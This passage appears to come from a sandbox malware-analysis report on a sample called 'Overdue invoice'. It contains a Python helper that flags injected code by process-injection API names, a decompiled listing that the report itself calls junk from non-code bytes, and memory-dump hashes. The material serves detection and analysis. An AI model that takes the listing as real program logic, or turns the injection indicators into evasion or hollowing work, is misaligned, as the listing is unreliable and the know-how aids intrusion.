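INJECTION_APIS = {"ResumeThread", "NtResumeThread", "WriteProcessMemory", "NtWriteVirtualMemory",
                  "SetThreadContext", "NtSetContextThread", "NtUnmapViewOfSection", "VirtualAllocEx"}


@dataclass
class FunctionRecord:
    api_calls: List[Tuple[str, str, int]] = field(default_factory=list)  # (api, module, ref addr)
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    fields: Dict[str, str] = field(default_factory=dict)  # API ID, String ID, hashes, ...

    def api_names(self) -> set:
        names = {api for api, _, _ in self.api_calls}
        if self.fields.get("API ID"):        # report's own summary token, e.g. ResumeThread
            names.add(self.fields["API ID"])
        return names


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per block ending in 'Uniqueness Score'; bullets/blank lines ignored."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if cur is None:
            cur = FunctionRecord()
        m = SOURCE_RE.match(line)
        if m:
            cur.source_file, cur.offset = m["file"], int(m["off"], 16)
            cur.based_on_pe = m["pe"] == "true"
            continue
        m = API_CALL_RE.match(line)
        if m:
            cur.api_calls.append((m["api"], m["mod"], int(m["ref"], 16)))
            continue
        m = KEY_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"].strip()
            if m["key"] == "Uniqueness Score":   # last line of a record
                records.append(cur)
                cur = None
    if cur is not None and cur.source_file:      # tolerate a truncated trailing record
        records.append(cur)
    return records


def region_info(sdmp_name: str) -> dict:
    """Decode base / Protect / Type from the dump name (field layout is an assumption)."""
    m = SDMP_RE.match(sdmp_name)
    if not m:
        raise ValueError(f"unrecognised .sdmp name: {sdmp_name}")
    prot, mtype = int(m["prot"], 16), int(m["type"], 16)
    return {"base": int(m["base"], 16), "protect": prot, "type": mtype,
            "rwx": prot == PAGE_EXECUTE_READWRITE, "image": mtype == MEM_IMAGE}


def injection_candidates(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Non-image, RWX functions that touch thread/process-control APIs."""
    return [r for r in records
            if not r.based_on_pe and region_info(r.source_file)["rwx"]
            and r.api_names() & INJECTION_APIS]


# Constructed sample: three records abbreviated from this report's function listing.
SAMPLE_REPORT = """\
APIs
• SetWindowLongW.USER32(?,?,?), ref: 00C2FCFD
Memory Dump Source
• Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
Similarity
• API ID: LongWindow
• String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
• API ID: ResumeThread
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.297583913.0000000000522000.00000002.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
• API ID:
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for r in injection_candidates(parse_records(SAMPLE_REPORT)):
        print(f"{r.source_file}: {sorted(r.api_names())} in RWX non-image region")
```

Run against a full report, the candidate list is a quick way to separate the hollowed/injected code (private RWX regions referencing ResumeThread, WriteProcessMemory and friends) from the benign-looking loader image, and the parsed Opcode ID / Instruction Fuzzy Hash fields can be pivoted across analyses to cluster samples.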
                                                                          C-Code - Quality: 73%
                                                                          Note: the listing below for the function at 0x524DB1 decodes almost entirely to privileged, invalid and segment-register instructions (sti, push cs, invalid, int 0, arpl, aaa, outsd, mov ss, es), which means the decompiler was run over non-code bytes; it does not represent the sample's logic and should not be used for signatures or behaviour analysis.
                                                                          			E00524DB1(signed int __eax, signed int* __ebx, signed int __ecx, signed int __edx, signed int* __edi, signed int* __esi) {
                                                                          				signed char _t68;
                                                                          				signed char _t70;
                                                                          				signed int _t71;
                                                                          				signed char _t73;
                                                                          				intOrPtr* _t74;
                                                                          				signed char _t76;
                                                                          				intOrPtr* _t77;
                                                                          				signed char _t79;
                                                                          				intOrPtr* _t80;
                                                                          				signed char _t82;
                                                                          				intOrPtr* _t83;
                                                                          				signed char _t85;
                                                                          				intOrPtr* _t86;
                                                                          				signed char _t88;
                                                                          				intOrPtr* _t89;
                                                                          				intOrPtr* _t91;
                                                                          				intOrPtr* _t93;
                                                                          				signed char _t95;
                                                                          				intOrPtr* _t96;
                                                                          				signed char _t98;
                                                                          				intOrPtr* _t99;
                                                                          				intOrPtr* _t100;
                                                                          				intOrPtr* _t101;
                                                                          				intOrPtr* _t103;
                                                                          				intOrPtr* _t105;
                                                                          				intOrPtr* _t107;
                                                                          				signed char _t109;
                                                                          				intOrPtr* _t110;
                                                                          				intOrPtr* _t112;
                                                                          				intOrPtr* _t114;
                                                                          				intOrPtr* _t115;
                                                                          				intOrPtr* _t116;
                                                                          				signed char _t122;
                                                                          				signed char _t123;
                                                                          				void* _t124;
                                                                          				intOrPtr* _t125;
                                                                          				intOrPtr* _t127;
                                                                          				void* _t128;
                                                                          				intOrPtr* _t130;
                                                                          				signed char _t131;
                                                                          				signed int _t132;
                                                                          				signed char _t133;
                                                                          				signed char _t134;
                                                                          				signed char _t136;
                                                                          				signed char _t137;
                                                                          				signed char _t140;
                                                                          				signed char _t143;
                                                                          				signed char _t144;
                                                                          				intOrPtr* _t145;
                                                                          				intOrPtr* _t146;
                                                                          				signed char _t147;
                                                                          				signed char _t148;
                                                                          				intOrPtr* _t149;
                                                                          				signed char _t150;
                                                                          				signed char _t152;
                                                                          				signed char _t153;
                                                                          				intOrPtr* _t154;
                                                                          				intOrPtr* _t156;
                                                                          				intOrPtr* _t157;
                                                                          				signed char _t164;
                                                                          				intOrPtr* _t165;
                                                                          				signed char _t167;
                                                                          				intOrPtr* _t168;
                                                                          				signed char _t170;
                                                                          				void* _t177;
                                                                          				void* _t178;
                                                                          				void* _t179;
                                                                          				void* _t180;
                                                                          				void* _t181;
                                                                          				void* _t182;
                                                                          				void* _t183;
                                                                          				void* _t184;
                                                                          				void* _t185;
                                                                          				void* _t186;
                                                                          				void* _t187;
                                                                          				signed int* _t188;
                                                                          				signed int _t189;
                                                                          				void* _t191;
                                                                          				void* _t192;
                                                                          				signed char _t194;
                                                                          				signed char _t195;
                                                                          				signed char _t196;
                                                                          				signed char _t197;
                                                                          				signed int _t205;
                                                                          				signed int* _t206;
                                                                          				signed int _t212;
                                                                          				signed int* _t216;
                                                                          				signed int _t217;
                                                                          				signed int _t218;
                                                                          				void* _t219;
                                                                          				void* _t221;
                                                                          				void* _t229;
                                                                          
                                                                          				_t216 = __esi;
                                                                          				_t205 = __edx;
                                                                          				asm("sti");
                                                                          				_push(cs);
                                                                          				_t218 = _t217 |  *__ebx;
                                                                          				 *__edi =  *__edi & __eax;
                                                                          				_t194 = __ecx & __edx;
                                                                          				asm("invalid");
                                                                          				_push(cs);
                                                                          				 *_t194 =  *_t194 + 1;
                                                                          				asm("sbb [edi+0x2b0b0efb], cl");
                                                                          				_push(cs);
                                                                          				_t68 = __eax | 0xfffffffffb8f2f29 |  *__edx;
                                                                          				 *__ebx =  *__ebx - _t68;
                                                                          				 *__esi =  *__esi + _t68;
                                                                          				_t70 = (_t68 |  *__esi) -  *(_t68 |  *__esi);
                                                                          				 *_t70 =  *_t70 + _t70;
                                                                          				asm("adc esi, [eax]");
                                                                          				 *_t70 =  *_t70 | _t70;
                                                                          				_t71 = _t70 ^  *_t70;
                                                                          				 *_t71 =  *_t71 + _t71;
                                                                          				asm("sbb al, [eax]");
                                                                          				 *_t194 =  *_t194 + __edx;
                                                                          				__esi[0xa3c614e] = __esi[0xa3c614e] & __edx;
                                                                          				asm("int 0x0");
                                                                          				 *__esi =  *__esi + _t71;
                                                                          				 *((intOrPtr*)(__edx + 0x200a0000)) =  *((intOrPtr*)(__edx + 0x200a0000)) - __ebx;
                                                                          				asm("arpl [edx], di");
                                                                          				_t195 = _t194 - _t194;
                                                                          				 *_t71 =  *_t71 + _t71;
                                                                          				 *_t71 =  *_t71 & _t71;
                                                                          				 *_t71 =  *_t71 + _t71;
                                                                          				 *((intOrPtr*)(_t219 + __edx)) =  *((intOrPtr*)(_t219 + __edx)) + __edx;
                                                                          				ss = es;
                                                                          				 *_t195 =  *_t195 + _t71;
                                                                          				_t73 = (_t71 & 0x6fa20216) -  *(_t71 & 0x6fa20216);
                                                                          				 *0xa0a0000 =  *0xa0a0000 + __edx;
                                                                          				 *_t195 =  *_t195 ^ _t73;
                                                                          				 *0x1a000000 =  *0x1a000000 + _t195;
                                                                          				 *_t73 =  *_t73 + _t73;
                                                                          				asm("adc [edx], eax");
                                                                          				 *((intOrPtr*)(_t195 + 0x280a0000)) =  *((intOrPtr*)(_t195 + 0x280a0000)) - __edx;
                                                                          				_t221 = es;
                                                                          				 *_t73 =  *_t73 + _t73;
                                                                          				_push(es);
                                                                          				_push(es);
                                                                          				_t74 = _t73 -  *_t73;
                                                                          				 *_t74 =  *_t74 + _t74;
                                                                          				_push(ds);
                                                                          				_t177 = 0xa0a0000 +  *0x0A0A0035;
                                                                          				 *_t74 =  *_t74 + _t74;
                                                                          				_t76 = _t74 + 0x0000002a &  *__edx;
                                                                          				 *_t76 =  *_t76 + _t76;
                                                                          				_t77 = _t76 + 0x2a;
                                                                          				 *_t77 =  *_t77 + _t77;
                                                                          				 *__esi =  *__esi + _t177;
                                                                          				_t178 = _t177 +  *0x0A0A0036;
                                                                          				 *_t77 =  *_t77 + _t77;
                                                                          				_t79 = _t77 + 0x0000002a &  *__edx;
                                                                          				 *_t79 =  *_t79 + _t79;
                                                                          				_t80 = _t79 + 0x2a;
                                                                          				 *_t80 =  *_t80 + _t80;
                                                                          				 *__esi =  *__esi + _t178;
                                                                          				_t179 = _t178 +  *0x0A0A0037;
                                                                          				 *_t80 =  *_t80 + _t80;
                                                                          				_t82 = _t80 + 0x0000002a &  *__edx;
                                                                          				 *_t82 =  *_t82 + _t82;
                                                                          				_t83 = _t82 + 0x2a;
                                                                          				 *_t83 =  *_t83 + _t83;
                                                                          				 *__esi =  *__esi + _t179;
                                                                          				_t180 = _t179 +  *0x0A0A0038;
                                                                          				 *_t83 =  *_t83 + _t83;
                                                                          				_t85 = _t83 + 0x0000002a &  *__edx;
                                                                          				 *_t85 =  *_t85 + _t85;
                                                                          				_t86 = _t85 + 0x2a;
                                                                          				 *_t86 =  *_t86 + _t86;
                                                                          				 *__esi =  *__esi + _t180;
                                                                          				_push(es);
                                                                          				_t131 = _t130 -  *_t130;
                                                                          				 *_t216 =  *_t216 + _t189;
                                                                          				_t197 = _t196 +  *_t131;
                                                                          				_t132 = _t131 &  *_t131;
                                                                          				 *_t205 =  *_t205 + _t197;
                                                                          				_t206 = _t205 -  *_t189;
                                                                          				 *_t189 =  *_t189 ^ _t132;
                                                                          				 *_t197 =  *_t197 + _t197;
                                                                          				 *_t132 =  *_t132 + _t132;
                                                                          				 *_t132 =  *_t132 + _t132;
                                                                          				 *_t132 =  *_t132 + _t132;
                                                                          				asm("adc [edx], eax");
                                                                          				if( *_t132 != 0) {
                                                                          					L37:
                                                                          					_t133 = _t132 ^  *_t132;
                                                                          					 *_t197 =  *_t197 + _t133;
                                                                          					_t134 = _t133 | 0x00000002;
                                                                          					if(_t134 < 0) {
                                                                          						goto L42;
                                                                          					} else {
                                                                          						 *_t134 =  *_t134 + _t134;
                                                                          						_t136 = _t134 + 8;
                                                                          						_pop(es);
                                                                          						 *0xa2b0000 =  *0xa2b0000 - _t136;
                                                                          						es = es;
                                                                          						_t189 = _t189 ^ _t212;
                                                                          						goto L39;
                                                                          					}
                                                                          				} else {
                                                                          					 *_t132 =  *_t132 + _t132;
                                                                          					_push(es);
                                                                          					_t143 = _t132 + 0x0000000a |  *_t212;
                                                                          					_t218 = _t218 +  *_t143;
                                                                          					_t144 = _t143 ^  *_t143;
                                                                          					 *_t197 =  *_t197 + _t144;
                                                                          					_t136 = _t144 | 0x00000002;
                                                                          					if(_t136 < 0) {
                                                                          						L39:
                                                                          						asm("fild qword [edx]");
                                                                          						 *_t136 =  *_t136 + _t136;
                                                                          						 *_t189 = _t206 +  *_t189;
                                                                          						 *_t189 =  *_t189 ^ _t136;
                                                                          						 *_t136 =  *_t136 + _t189;
                                                                          						 *_t136 =  *_t136 + _t136;
                                                                          						 *_t197 =  *_t197 + _t136;
                                                                          						 *_t136 =  *_t136 + _t136;
                                                                          						asm("adc [edx], eax");
                                                                          						if( *_t136 == 0) {
                                                                          							 *_t136 =  *_t136 + _t136;
                                                                          							_push(es);
                                                                          							_push(es);
                                                                          							_t140 = _t136 + 0xa - 0xd +  *_t189;
                                                                          							if(_t140 >= 0) {
                                                                          								goto L36;
                                                                          							} else {
                                                                          								 *_t140 =  *_t140 + _t140;
                                                                          								 *_t140 =  *_t140 + _t140;
                                                                          								_pop(ss);
                                                                          								asm("outsd");
                                                                          								_t134 = _t197 |  *(_t212 - 0x40) |  *_t206;
                                                                          								 *_t134 =  *_t134 + _t134;
                                                                          								_push(es);
                                                                          								asm("rol dword [eax], 0x0");
                                                                          								_t197 = _t140 +  *_t134 |  *_t206;
                                                                          								L42:
                                                                          								 *_t189 = _t206 +  *_t189;
                                                                          								 *_t197 =  *_t197 ^ _t134;
                                                                          								 *((intOrPtr*)(_t134 + _t134)) =  *((intOrPtr*)(_t134 + _t134)) + _t197;
                                                                          								 *_t134 =  *_t134 + _t134;
                                                                          								_pop(es);
                                                                          								 *_t134 =  *_t134 + _t134;
                                                                          								asm("adc [ebx], eax");
                                                                          								_t136 = (_t134 |  *_t216) - 6;
                                                                          								 *_t136 =  *_t136 + _t136;
                                                                          								_push(es);
                                                                          								_t197 = _t197 +  *((intOrPtr*)(_t212 - 0x74)) -  *_t189;
                                                                          								 *_t206 =  *_t206 ^ _t136;
                                                                          								 *_t197 = _t206 +  *_t197;
                                                                          								 *_t136 =  *_t136 + _t136;
                                                                          								 *_t136 =  *_t136 + _t136;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						 *_t136 =  *_t136 + _t136;
                                                                          						_t145 = _t136 + 8;
                                                                          						_pop(es);
                                                                          						 *0xa2b0000 =  *0xa2b0000 - _t145;
                                                                          						es = es;
                                                                          						_t146 = _t145 -  *_t145;
                                                                          						 *_t146 =  *_t146 + _t146;
                                                                          						asm("adc esi, [eax]");
                                                                          						_t147 = _t146 +  *_t146;
                                                                          						 *_t147 =  *_t147 - _t147;
                                                                          						 *_t147 =  *_t147 + _t147;
                                                                          						 *_t147 =  *_t147 & _t147;
                                                                          						 *_t197 = _t206 +  *_t197;
                                                                          						_t189 = (_t189 ^ _t212) +  *((intOrPtr*)((_t189 ^ _t212) + 0x46));
                                                                          						 *_t147 =  *_t147 + _t147;
                                                                          						_t140 = _t147 + 0xa;
                                                                          						L36:
                                                                          						_t132 = _t140 |  *_t216 |  *_t212;
                                                                          						_t218 = _t218 +  *_t132;
                                                                          						_t216 = 0x740a0000;
                                                                          						goto L37;
                                                                          					}
                                                                          				}
                                                                          				 *_t136 =  *_t136 + _t136;
                                                                          				 *_t206 =  *_t206 + _t136;
                                                                          				_push(ss);
                                                                          				asm("outsd");
                                                                          				_t137 = _t197;
                                                                          				 *_t137 =  *_t137 + _t137;
                                                                          				_push(es);
                                                                          				asm("fiadd word [edi]");
                                                                          				return _t137;
                                                                          			}
                                                                          0x00000000
                                                                          0x00524f82
                                                                          0x00524f82
                                                                          0x00524f84
                                                                          0x00524f86
                                                                          0x00524fc8
                                                                          0x00524fc8
                                                                          0x00524fca
                                                                          0x00524fcc
                                                                          0x0052500f
                                                                          0x0052500f
                                                                          0x00525010
                                                                          0x00525012
                                                                          0x00525013
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00524fce
                                                                          0x00524fce
                                                                          0x00524fd0
                                                                          0x00524fd2
                                                                          0x00525015
                                                                          0x00525015
                                                                          0x00525017
                                                                          0x00525019
                                                                          0x0052501c
                                                                          0x0052501c
                                                                          0x00525020
                                                                          0x00525023
                                                                          0x00525024
                                                                          0x00525025
                                                                          0x00525028
                                                                          0x0052502a
                                                                          0x0052502c
                                                                          0x00525071
                                                                          0x00525071
                                                                          0x00525073
                                                                          0x00525075
                                                                          0x0052502e
                                                                          0x0052502e
                                                                          0x00525030
                                                                          0x00525032
                                                                          0x00525034
                                                                          0x00525038
                                                                          0x00525039
                                                                          0x0052503b
                                                                          0x0052503c
                                                                          0x0052503c
                                                                          0x0052503d
                                                                          0x00525040
                                                                          0x00525042
                                                                          0x00525044
                                                                          0x00525047
                                                                          0x00525049
                                                                          0x0052504b
                                                                          0x0052504e
                                                                          0x00525050
                                                                          0x00525051
                                                                          0x00525054
                                                                          0x00525056
                                                                          0x00525058
                                                                          0x0052505b
                                                                          0x0052505d
                                                                          0x0052505f
                                                                          0x00525061
                                                                          0x00525064
                                                                          0x00525068
                                                                          0x0052506a
                                                                          0x0052506c
                                                                          0x0052506d
                                                                          0x0052506f
                                                                          0x00000000
                                                                          0x0052506f
                                                                          0x00525032
                                                                          0x00524fd4
                                                                          0x00524fd4
                                                                          0x00524fd8
                                                                          0x00524fd9
                                                                          0x00524fdb
                                                                          0x00524fdc
                                                                          0x00524fdc
                                                                          0x00524fdd
                                                                          0x00524fe0
                                                                          0x00524fe2
                                                                          0x00524fe4
                                                                          0x00524fe5
                                                                          0x00524fe8
                                                                          0x00524fec
                                                                          0x00524fee
                                                                          0x00524ff1
                                                                          0x00524ff3
                                                                          0x00524ff5
                                                                          0x00524ff7
                                                                          0x00524ff9
                                                                          0x00524ffc
                                                                          0x00524ffe
                                                                          0x00525000
                                                                          0x00525002
                                                                          0x00525004
                                                                          0x00525005
                                                                          0x00525007
                                                                          0x00525009
                                                                          0x0052500b
                                                                          0x0052500d
                                                                          0x00000000
                                                                          0x0052500d
                                                                          0x00524fd2
                                                                          0x00524f88
                                                                          0x00524f88
                                                                          0x00524f8c
                                                                          0x00524f8d
                                                                          0x00524f8f
                                                                          0x00000000
                                                                          0x00524f8f
                                                                          0x00524f86
                                                                          0x00524f80
                                                                          0x00525077
                                                                          0x00525079
                                                                          0x0052507b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0052507d
                                                                          0x0052507f
                                                                          0x00525081
                                                                          0x00525083
                                                                          0x00525084
                                                                          0x00525086
                                                                          0x00525088
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0052508a
                                                                          0x0052508c
                                                                          0x0052508e
                                                                          0x00525091
                                                                          0x00525093
                                                                          0x00525095
                                                                          0x00525098
                                                                          0x0052509a
                                                                          0x0052509b
                                                                          0x0052509d
                                                                          0x0052509f
                                                                          0x005250a1
                                                                          0x005250a2
                                                                          0x005250a4
                                                                          0x005250a6
                                                                          0x005250a8
                                                                          0x005250ee
                                                                          0x005250f1
                                                                          0x005250aa
                                                                          0x005250aa
                                                                          0x005250ac
                                                                          0x005250ae
                                                                          0x005250b0
                                                                          0x005250b2
                                                                          0x005250b4
                                                                          0x005250b7
                                                                          0x005250b9
                                                                          0x005250ba
                                                                          0x005250bc
                                                                          0x005250be
                                                                          0x005250c0
                                                                          0x005250c1
                                                                          0x005250c3
                                                                          0x005250c5
                                                                          0x005250c7
                                                                          0x005250c9
                                                                          0x005250cb
                                                                          0x005250cd
                                                                          0x005250cf
                                                                          0x005250d1
                                                                          0x005250d3
                                                                          0x005250d5
                                                                          0x005250d8
                                                                          0x005250dc
                                                                          0x005250de
                                                                          0x005250e0
                                                                          0x005250e2
                                                                          0x005250e5
                                                                          0x005250e7
                                                                          0x005250e8
                                                                          0x005250ea
                                                                          0x005250ec
                                                                          0x00000000
                                                                          0x005250ec
                                                                          0x005250ae
                                                                          0x005250f5
                                                                          0x005250f7
                                                                          0x005250fb
                                                                          0x005250fd
                                                                          0x005250fe
                                                                          0x00525100
                                                                          0x00525101
                                                                          0x00525103
                                                                          0x00525105
                                                                          0x00525107
                                                                          0x00525109
                                                                          0x0052510b
                                                                          0x0052510d
                                                                          0x0052510f
                                                                          0x00525111
                                                                          0x00525113
                                                                          0x00525115
                                                                          0x00525117
                                                                          0x00525119
                                                                          0x00525161
                                                                          0x00525161
                                                                          0x00525163
                                                                          0x00525165
                                                                          0x00525167
                                                                          0x00000000
                                                                          0x00525169
                                                                          0x00525169
                                                                          0x0052516b
                                                                          0x0052516d
                                                                          0x0052516e
                                                                          0x00525175
                                                                          0x00525176
                                                                          0x00000000
                                                                          0x00525176
                                                                          0x0052511b
                                                                          0x0052511b
                                                                          0x0052511f
                                                                          0x00525120
                                                                          0x00525122
                                                                          0x00525129
                                                                          0x0052512b
                                                                          0x0052512d
                                                                          0x0052512f
                                                                          0x00525177
                                                                          0x00525177
                                                                          0x00525179
                                                                          0x0052517b
                                                                          0x0052517d
                                                                          0x0052517f
                                                                          0x00525181
                                                                          0x00525183
                                                                          0x00525185
                                                                          0x00525187
                                                                          0x00525189
                                                                          0x0052518b
                                                                          0x0052518f
                                                                          0x00525192
                                                                          0x00525193
                                                                          0x00525195
                                                                          0x00000000
                                                                          0x00525197
                                                                          0x00525197
                                                                          0x0052519c
                                                                          0x005251a2
                                                                          0x005251a3
                                                                          0x005251a4
                                                                          0x005251a5
                                                                          0x005251a7
                                                                          0x005251aa
                                                                          0x005251ad
                                                                          0x005251af
                                                                          0x005251af
                                                                          0x005251b1
                                                                          0x005251b3
                                                                          0x005251b6
                                                                          0x005251b8
                                                                          0x005251b9
                                                                          0x005251bb
                                                                          0x005251bf
                                                                          0x005251c4
                                                                          0x005251c6
                                                                          0x005251c7
                                                                          0x005251c9
                                                                          0x005251cb
                                                                          0x005251cd
                                                                          0x005251cf
                                                                          0x005251cf
                                                                          0x00525195
                                                                          0x00525131
                                                                          0x00525131
                                                                          0x00525133
                                                                          0x00525135
                                                                          0x00525136
                                                                          0x0052513d
                                                                          0x00525140
                                                                          0x00525142
                                                                          0x00525144
                                                                          0x00525146
                                                                          0x00525148
                                                                          0x0052514a
                                                                          0x0052514c
                                                                          0x0052514e
                                                                          0x00525150
                                                                          0x00525153
                                                                          0x00525155
                                                                          0x00525156
                                                                          0x00525158
                                                                          0x0052515a
                                                                          0x0052515c
                                                                          0x00000000
                                                                          0x0052515c
                                                                          0x0052512f
                                                                          0x005251d1
                                                                          0x005251d3
                                                                          0x005251d5
                                                                          0x005251d6
                                                                          0x005251d7
                                                                          0x005251d8
                                                                          0x005251da
                                                                          0x005251db
                                                                          0x005251df

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.297583913.0000000000522000.00000002.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                                                          • Associated: 00000000.00000002.297565297.0000000000520000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.297763203.00000000005BC000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.297784487.00000000005C6000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_520000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 893d992448fcceffcf45ba799183bbad3250e7a40c7c0540991a93a8a74b845a
                                                                          • Instruction ID: 1464a4e6071fc33a7806a75dab81a627f2e8d0e09aa04e230bd7e174bc915fd1
• Opcode Fuzzy Hash: 893d992448fcceffcf45ba799183bbad3250e7a40c7c0540991a93a8a74b845a
• Instruction Fuzzy Hash: BA22C16244E3D15FCB135B78ADB51E17FB19E6721871E09CBD8C0CF0A3E11829AAD762
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d523307edf7e2b08c8d7d0424ec15291ca5898beb6ed029c08196722000c4cb
• Instruction ID: 62778486181e09287a8a092cb9dc7a039fc33f50e2fc6036df8abe8697f390fa
• Opcode Fuzzy Hash: 5d523307edf7e2b08c8d7d0424ec15291ca5898beb6ed029c08196722000c4cb
• Instruction Fuzzy Hash: 2A12A3F1611F468BE710CF65EC983AE3BA1B745328F924308D2612BAF1D7B8154AEF54
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07bb0d4271d46584a6d4ec1f4e827277da09db59b359a7d9381ab3dc9a07e265
• Instruction ID: f9d5ada9b93c66768f99fde23df27b77172ddaa4900b4eb1c0fad609d4ca5e4c
• Opcode Fuzzy Hash: 07bb0d4271d46584a6d4ec1f4e827277da09db59b359a7d9381ab3dc9a07e265
• Instruction Fuzzy Hash: 4EA18C32E00629CFCF15DFB5D8445DEBBB2FF95300B15856AE816AB225EB30AD46CB50
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dd52248c734efa5303034440764576cedfd50de79e18906ad85923d3cba4f5e1
• Instruction ID: 09370f8e638b3831f15dcf5d2a608944d0d9f80c824888a43408c0ffd49baf07
• Opcode Fuzzy Hash: dd52248c734efa5303034440764576cedfd50de79e18906ad85923d3cba4f5e1
• Instruction Fuzzy Hash: B5C138B1A11B468BD710DF65EC883AF3B61BB85328F524318D2612B6F1D7B8148ADF94
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d619d928e6d4da07124e1789f83cf2dc2cc5d822ce836ab7eece59e59e019f21
• Instruction ID: cad60bbc96cf0a7cfb72310716a0df7699774093e6a0459db9dc90df10c8d724
• Opcode Fuzzy Hash: d619d928e6d4da07124e1789f83cf2dc2cc5d822ce836ab7eece59e59e019f21
• Instruction Fuzzy Hash: D0916CB4E14519CBCB14DFA9C9846AEFBF6FF89304F24C16AD418A7215D730AA81CF60
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b175b31b43c7c9330b0ed8ed3dfba7354522dda1d5971f313ef130afd89c965
• Instruction ID: b2c6eaba26d3068853c3f446f79a6592d326dc56fdcf6793310e250b70fc2bbe
• Opcode Fuzzy Hash: 8b175b31b43c7c9330b0ed8ed3dfba7354522dda1d5971f313ef130afd89c965
• Instruction Fuzzy Hash: 4B7104B4E25609CFCB08CFA9C9849DEFBF2FB89210F24942AD415B7314D7709A818F64
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c857a476da1763abfc054ea5d5003be1425707e1b9e56746a7f67f04ded0400
• Instruction ID: bad299fca8fa056933c6d43c810d6654432dcd3f39b3269e75eca4549688fe35
• Opcode Fuzzy Hash: 1c857a476da1763abfc054ea5d5003be1425707e1b9e56746a7f67f04ded0400
• Instruction Fuzzy Hash: 927137B0E5122A8BDB64DF66C9447A9BBB2FF89300F10C5EAD40DA7255EB305AC5CF40
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39d11d33f7394336280ba2d6e9d018ff44446fed30004a418610880c496a2e3a
• Instruction ID: 7f73bf01ea1c0e898d03bb662ec07340bbbfc98ecd588df7053e1a1ca39cae1a
• Opcode Fuzzy Hash: 39d11d33f7394336280ba2d6e9d018ff44446fed30004a418610880c496a2e3a
• Instruction Fuzzy Hash: 757116B4E2120ADFCB04DF9AD5849AEFBB6FB89310F10942AD515A7310E3749A91CF91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28ae568bbfaa87a834854a5115d731d54efbfd5decd4461aa8a30b07b7a67043
• Instruction ID: ff271cdd7c3e221c833241b34c094ae6f3059ba242dd5a4ec45994b9dd47bac9
• Opcode Fuzzy Hash: 28ae568bbfaa87a834854a5115d731d54efbfd5decd4461aa8a30b07b7a67043
